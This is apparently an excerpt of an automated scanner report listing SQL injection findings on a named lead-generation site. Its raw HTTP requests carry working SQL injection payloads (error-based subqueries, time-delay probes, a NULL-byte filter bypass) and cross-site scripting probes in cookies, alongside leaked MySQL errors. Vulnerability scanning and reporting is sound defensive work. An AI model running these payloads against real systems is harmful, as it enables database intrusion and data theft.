GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2gitcbcuk01mb5lnavbmgr6qg4; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.375. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1'=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bo6cnvdc2skusokcpnk93k2957; path=/
Content-Length: 4126
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(se' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1''=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 2

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=f0kmuii3lqgn3vrjhojodr5qm6; path=/
Content-Length: 3949
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.376. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2/1'B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i5fmam6r8e1k86dla0o9j2qf36; path=/
Content-Length: 4126
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))%2/1'B'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''B'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+' at line 5

1.377. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&1%00'=1 HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:23:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sdt7f3v2sfgr6f5ncrijsch801; path=/
Content-Length: 2262
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
roup_id = prj.groupId    
    where prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=iupsc&1.'=1' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=iupsc&1.'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc=iupsc' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&1%00''=1 HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:23:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ddv0rgsignbdlov1ab7bku7c34; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.378. http://www.insideup.com/ppc/leadflow/hins00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the phone parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=c7e0rfuudhu3vm4ei04021req4; path=/
Content-Length: 7318
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
es&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.379. http://www.insideup.com/ppc/leadflow/hins00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=SELECT%20pg_sleep(30)--&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=ufgvhtdgfc6dt7a8k325fc19l7; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
